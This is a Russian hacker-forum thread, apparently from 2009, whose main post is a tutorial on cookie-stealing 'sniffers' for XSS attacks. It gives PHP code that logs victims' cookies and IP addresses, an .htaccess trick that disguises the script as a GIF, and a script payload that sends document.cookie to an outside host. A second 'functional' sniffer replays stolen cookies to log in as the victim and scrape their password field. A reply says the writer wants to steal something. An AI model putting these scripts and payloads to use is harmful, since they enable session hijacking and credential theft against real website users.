Реклама на hackersoft.ru Реклама на hackersoft.ru

Вернуться   Форумы Hackersoft > Околотематические разделы > Для разработчиков
CHAT Справка Пользователи Доска почета Календарь Поиск Сообщения за день Все разделы прочитаны

Ответ
 
Опции темы
Старый 18.02.2009, 00:00   #1
[email protected]
advanced 
 
Аватар для odr@dek
 
Регистрация: 22.06.2008
Сообщений: 385
Вес репутации: 14 odr@dek специалистodr@dek специалистodr@dek специалистodr@dek специалистodr@dek специалистodr@dek специалист
Депозит: 0$
Вы сказали Спасибо: 31
Поблагодарили 246 раз(а) в 128 сообщениях
24.05.2006

Ну чтож в прошлой статье мы разговаривали о XSS обычно XSS приводит к тому что
есть возможность украсть плюшки (cookies) другого пользователя как раз для этого
и используются снифера которые собирают информацию полученную с сервера.
Напишем свой собственный маленьких снифер:

PHP код:
<?
$snif
[] = date("d.m.Y H:i"); // дата
$snif[] = $_SERVER['REMOTE_ADDR']; // айпишник юзверя
@$snif[] = $_SERVER['HTTP_REFERER']; // рефер
@$snif[] = $_SERVER['QUERY_STRING']; // переданные параметру снифферу
$snif[] = $_SERVER['HTTP_USER_AGENT'];  // агент юзверя =)
$file "file.txt"// файл в который будут записаны данные
$s fopen($file,"a+");
@
$sa fread ($s,filesize($file));
$fp fopen($file,"w");
foreach (
$snif as $sniffed)
{
fwrite($fp,"\n".$sniffed);
}
fwrite($fp,"\n");
fwrite($s,$sa);
fclose($s);
fclose($fp);
?>
Можно еще поменять расширение php на gif чтобы никаких подозрений наш скрипт не
вызывал. Этого можно достигнуть благодаря .htaccess в котором прописано
следующие:
<Files "g.gif">
AddType application/x-httpd-php .gif
</Files> и залить его в туже папку где и находится наш снифер, но мне так
и не удалось найти бесплатный хостинг который без проблем съел такой .htaccess.
НО если тебе лень писать свой снифер или лень нажать Ctrl+C и Ctrl+V тогда ты
можешь найти в сети много публичных сниферов.

Ну чтож у нас есть снифер допустим мы нашли XSS попробуем составить запрос:
<script>img= new Image();
img.src="www.site.ru/sniffer.php?"+document.cookie</script>
ну тут я думаю все понятно создаем с помощью JS "картинку"(сниффер) и плюс
передаем кукисы пользователя. Вот и усе в файле file.txt лежат кукисы
пользователя.

Ну чтож начало статьи было очень банально, но сейчас я хочу вам рассказать о
таких сниферах которые выполняют за вас грязную работу =)) Их прозвали
Функциональные сниферы. Идея очень проста, как и все гениальное так как
хацкеры по своей натуре ленивые существа то они подумали почему бы не написать
такой снифер которые после получения кукисов заходит под пользователем у
которого были получены эти кукисы и тырил бы какую-нибудь важную информацию
(иногда это Pass если вспомнить скрипты от Wr у которого мы часто находили баги
то у него пасс отображается в открытом виде после входа пользователя) ну чтож
задача ясна, попробуем реализовать:

PHP код:
<?
$snif 
urldecode($_SERVER['QUERY_STRING']); // переданные параметру снифферу
$name explode("|",$snif); //так как кукисы состоят из 3 параметров записываем
                            //каждое  значение в массив
/*теперь создаем запрос:*/
$zapr "GET http://%/tools.php?event=profile&pname=
        "
.$name[0]." HTTP/1.0\r\n";
$zapr .= "Referer:http://%/\r\n";
$zapr .= "Cookie: wrfcookies=".$snif."\r\n";
$zapr .= "Host: %\r\n\r\n";
$file "file.txt"// файл в который будут записываться данные
$s fopen($file,"a+");
@
$sa fread ($s,filesize($file));
$fp fopen($file,"w");

$f fsockopen ("%"80); // подключаемся к серверу
if (!$f) {
    echo 
"Не удалось=(((";
} else {
    
fwrite ($f,$zapr); //выполняем запрос к серверу

        
while (!feof($f))
        {
        
$get=fgets($f,512); читаем файт(страницу)
        
$full=explode("<input",$get);
        foreach(
$full as $input)
        {
          if (
strstr($input,"name=pass"))
          {
           
fwrite($fp,$name[0]."\n".$input."\n\n");
           
fwrite($s,$sa);
          }
        }

        }
    
fclose ($f);

        }
fclose($s);
fclose($fp);
?>
Конечно это только простейший вариант можно еще впихнуть туда много побочной
инфы но это я оставлю на тебя =))) Преимущество функциональных сниферов очень
велико, конечно, есть один недостаток придется каждый раз немножко изменять код
перед использованием снифера в новой ситуации, но это мелочь.


© pridu_ROCK aka Rocky

Мудр тот, кто знает не многое, а нужное.
Эсхил
odr@dek вне форума   Ответить с цитированием
Благодарности: 2
Старый 24.12.2016, 01:33   #2
leh12
advanced 
 
Аватар для leh12
 
Регистрация: 26.10.2008
Сообщений: 432
Вес репутации: 10 leh12 знатокleh12 знаток
Депозит: 0$
Вы сказали Спасибо: 26
Поблагодарили 81 раз(а) в 54 сообщениях
Работает енто....?
Интересно..
я попробую продолжения сделать..,,
Если работает..
Занимался хешкат = надоело ..хочется чего то спи...ить..
leh12 вне форума   Ответить с цитированием
Ответ


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы

Ваши права в разделе
Вы не можете создавать темы
Вы не можете отвечать на сообщения
Вы не можете прикреплять файлы
Вы не можете редактировать сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.


Часовой пояс GMT +4, время: 09:50.


© 2005 — +∞ Hackersoft. Все и вся защищены.
Публичная оферта | Правила форума | Реклама на сайте
Powered by vBulletin®©™ Jelsoft®©™ Enterprises Ltd. Перевод: zCarot.
Реклама на hackersoft.ru Реклама на hackersoft.ru